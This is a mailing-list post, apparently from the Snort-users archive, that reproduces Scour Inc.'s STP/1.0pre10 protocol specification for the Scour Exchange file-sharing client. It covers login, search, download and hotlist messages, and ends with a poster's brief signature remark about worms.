url: http://www.scour.com/Software/Scour_Exchange/stp-1.0pre10.html

Scour Transfer Protocol -- STP/1.0pre10


Copyright Notice

This document is meant to serve as a guideline for developers wishing
to understand the details of the Scour Exchange protocol in order to
create or make changes to existing Scour Exchange clients for various
platforms.

Scour, Inc. makes no representations or warranties as to the accuracy
of this document. Please send all correspondence to opendev at ...614...

Copyright (C) 1999-2000 Scour, Inc.



 General 

The server and client are linked by a client-initiated 
TCP connection. The maximum packet size is 64 kilobytes. Packets
larger than 64KB should be split into multiple packets.

New Login (sx client --» sx server) 

STP/1.0 NEWLOGIN\r\n
User-Agent: «agent»\r\n
Username: «username»\r\n
Password: «password»\r\n
First: «firstname»\r\n
Last: «lastname»\r\n
Email: «email»\r\n
Gender: «gender»\r\n
Age: «age»\r\n
Zip: «zipcode»\r\n
IP: «ip»\r\n
Port: «port»\r\n
Speed: «speed»\r\n
Firewall: «firewall»\r\n
\r\n

Optional Fields: User-Agent, Gender, Age, Zip, Hint, Speed,
Firewall

Notes
A blank Firewall setting (or "unknown" as a value) will cause
the sx server to probe the client to determine the firewall
state.

IP is what the client thinks its IP address is.

Login (sx client --» sx server) 

STP/1.0 LOGIN\r\n
User-Agent: «agent»\r\n
Username: «username»\r\n
Password: «password»\r\n
IP: «ip»\r\n
Port: «port»\r\n
Speed: «speed»\r\n
Firewall: «firewall»\r\n
\r\n

Optional Fields: User-Agent, Speed, Firewall

Login Response 1xx (sx server --» sx client) 

STP/1.0 100 Authorized\r\n
Firewall: «firewall»\r\n
\r\n

STP/1.0 101 Unauthorized\r\n
\r\n

STP/1.0 102 Invalid Login Request\r\n
\r\n

STP/1.0 104 Username already registered\r\n
\r\n

STP/1.0 105 Already Logged In\r\n
\r\n

Add File(s) (sx client --» sx server) 

STP/1.0 ADD\r\n
Filename: «filename»\r\n
Size: «size»\r\n
MD5: «md5hash»\r\n
Bitrate: «bitrate»\r\n
Duration: «duration»\r\n
Freq: «frequency»\r\n
Width: «width»\r\n
Height: «height»\r\n
Bpp: «bpp»\r\n
Fps: «fps»\r\n
Filename: «filename»\r\n
Size: «size»\r\n
MD5: «md5hash»\r\n
Bitrate: «bitrate»\r\n
Duration: «duration»\r\n
Freq: «frequency»\r\n
Width: «width»\r\n
Height: «height»\r\n
Bpp: «bpp»\r\n
Fps: «fps»\r\n
....
\\r\n

Optional fields: Bitrate, Duration, Freq, Width, Height, Bpp, Fps

Notes
Can have multiple "Filename" segments per ADD message.

The MD5 hash is calculated using the first 300KB (307200 bytes)
of the file being added.

Delete File(s) (sx client --» sx server) 

STP/1.0 DELETE\r\n
Filename: «filename»\r\n
Filename: «filename»\r\n
Filename: «filename»\r\n
\r\n

Can have multiple "Filename" entries per DELETE message.

Download Request (sx client --» sx client) 

STP/1.0 GET\r\n
User-Agent: «agent»\r\n
Username: «username»\r\n
Filename: «filename»\r\n
Range: bytes=«start»-«end»\r\n
Speed: «speed»\r\n
\r\n

Optional fields: User-Agent, Range, Speed

This is sent when the sx client is not firewalled.

Download Request (sx client --» sx server) 

STP/1.0 GET\r\n
User-Agent: «agent»\r\n
Servername: «username»\r\n
Filename: «filename»\r\n
Range: bytes=«start»-«end»\r\n
\r\n

Optional fields: User-Agent, Range

Download Request (sx server --» sx client) 

STP/1.0 GET\r\n
Username: «username»\r\n
Filename: «filename»\r\n
Range: bytes=«start»-«end»\r\n
Speed: «speed»\r\n
IP: «ip»\r\n
Port: «port»\r\n
\r\n

Optional fields: Range, Speed

Download Response 200 (sx client --» sx client) 

STP/1.0 200 OK\r\n
User-Agent: «agent»\r\n
Servername: «username»\r\n
Filename: «filename»\r\n
MD5: «md5hash»\r\n
Speed: «speed»\r\n
Content-Length: «length»\r\n
Content-Range: bytes=«start»-«end»/«filesize»\r\n
Content-Type: «type»\r\n
\r\n
[Entity-Body]


Optional fields: User-Agent, Content-Range, Speed

Notes
"Content-Type" should be "application/octet-stream" for all
file transfers.

Download Response Error 40x (sx client --» sx client) 

STP/1.0 400 Bad Request\r\n
User-Agent: «agent»\r\n
Servername: «servername»\r\n
Filename: «filename»\r\n
\r\n

STP/1.0 401 Queue Full\r\n
User-Agent: «agent»\r\n
Servername: «servername»\r\n
Filename: «filename»\r\n
\r\n

STP/1.0 404 File Not Found\r\n
User-Agent: «agent»\r\n
Servername: «servername»\r\n
Filename: «filename»\r\n
\r\n

Optional fields: User-Agent

Download Response Error 41x (sx server --» sx client) 

STP/1.0 410 Server Not Found\r\n
Servername: «username»\r\n
Filename: «filename»\r\n
\r\n

SEARCH (sx client --» sx server) 

STP/1.0 SEARCH\r\n
Search-ID: «id»\r\n
Type: «type»\r\n
Offset: «offset»\r\n
Num-Results: «num»\r\n
MD5: «md5»\r\n
Width: «width»\r\n
Height: «height»\r\n
Bitrate: «bitrate»\r\n
Duration: «duration»\r\n
Freq: «freq»\r\n
Speed: «speed»\r\n
Bpp: «bpp»\r\n
Fps: «fps»\r\n
Username: «username»\r\n
Query: «querystring»\r\n
...
\\r\n

Optional fields: MD5, Width, Height, Bitrate, Freq, Speed, Bpp, Fps
Search-ID, Offset, Num-Results, Type

Offset defaults to 0, Num-Results defaults to 100, Type defaults to all

Notes

If Username is specified, the query will return a listing of
files on that host.

Search-ID is a identifier created by the client. The identifier
is copied into the Search Response 300. This should allow the client
to match the results with the corresponding query. This field can
have an alphanumeric value.

If MD5 is sent, this means the client is requesting a list of files
which have the corresponding MD5 hash. The fields Type,Width,Height,
Bitrate,Freq,Speed, and Keyword should not be present.

A client can have only one outstanding search query. If a 2nd
SEARCH is sent, the first is cancelled if the results haven't
already been sent to the client.


CANCEL_SEARCH (sx client --» sx server) 

STP/1.0 CANCEL_SEARCH\r\n
\r\n

Notes

A client can have only one outstanding search query. The CANCEL_SEARCH
will cancel the current query. The search results may or may not be
sent to the client -- depending on when the CANCEL_SEARCH was sent.


Search Response 30x (sx server --» sx client) 

STP/1.0 300 OK\r\n
Search-ID: «id»\r\n
Type: «type»\r\n
Offset: «offset»\r\n
Num-Results: «num»\r\n
Filename: «filename»\r\n
Username: «username»\r\n
IP: «ip»\r\n
Port: «port»\r\n
Speed: «speed»\r\n
MD5: «md5»\r\n
Size: «size»\r\n
Width: «width»\r\n
Height: «height»\r\n
Bitrate: «bitrate»\r\n
Freq: «freq»\r\n
Duration: «duration»\r\n
Bpp: «bpp»\r\n
Fps: «fps»\r\n
Filename: «filename»\r\n
Username: «username»\r\n
...
\\r\n

STP/1.0 301 Database Error\r\n
Search-ID: «id»\r\n

Optional fields: Width, Height, Bitrate, Freq, Duration, Bpp, Fps


Add User (sx client --» sx server) 

STP/1.0 ADDUSER\r\n
Username: «username»\r\n
Username: «username»\r\n
...
\\r\n

Notes
This adds a user to the client's Hotlist. The backend 
will send notification to the client when a user's online 
status changes.

This should be sent once after logging in, and any time a 
user is added to the Hotlist.


Delete User (sx client --» sx server) 

STP/1.0 DELUSER\r\n
Username: «username»\r\n
Username: «username»\r\n
...
\\r\n

Notes
This deletes a user from the client's Hotlist.


User Status (sx server --» sx client) 

STP/1.0 USER_STATUS\r\n
Username: «username»\r\n
Status: «status»\r\n
\r\n

status = online | offline

Notes
This notifies the sx client that a user on its Hotlist has changed status.


Server Error (sx server --» sx client) or (sx client -» sx client) 

STP/1.0 500 Internal Server Error\r\n
User-Agent: «agent»\r\n
\r\n

STP/1.0 501 Not Implemented\r\n
User-Agent: «agent»\r\n
\r\n

Optional fields: User-Agent

Notes
500 is sent for malformed commands

STAT (sx server --» sx client) 

STP/1.0 STAT\r\n
Ack-Required: «ackval»\r\n
Total-Users: «totalusers»\r\n
Total-Files: «totalfiles»\r\n
Total-Size: «totalsize»\r\n
\r\n


Notes
ackval = yes | no

If ackval == yes, then client must send a "STP/1.0 ACK" message (described below)
to the sx server.


Total-Size is reported in megabytes.

HELO (sx client --» sx client) or (sx server -» sx client) 

STP/1.0 HELO\r\n
\r\n

ACK (sx client --» sx client) or (sx client -» sx server) 

STP/1.0 ACK\r\n
User-Agent: «agent»\r\n
Username: «username»\r\n
\r\n

Optional fields: User-Agent



Data Types 

Username = 2 to 32 chars, [0-9a-zA-Z_-]
Gender = M | F
Firewall = yes | no | unknown
Password = MD5 hash of actual password, 32 chars
MD5 = 32 chars, [0-9a-f]
Type = all|audio|video|image|mp3|jpeg|gif
Speed = number, 0-10
0  unknown
1  14.4 kbps
2  28.8 kbps
3  33.6 kbps
4  56.7 kbps
5  64K ISDN
6  128K ISDN
7  Cable
8  DSL
9  T1
10 T3 or greater


--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--

This sort of worm "fun" is just beginning IMHO.  --dr

-- 
Dragos Ruiu <dr at ...50...>   dursec.com ltd. / kyx.net - we're from the future 
gpg/pgp key on file at wwwkeys.pgp.net



More information about the Snort-users mailing list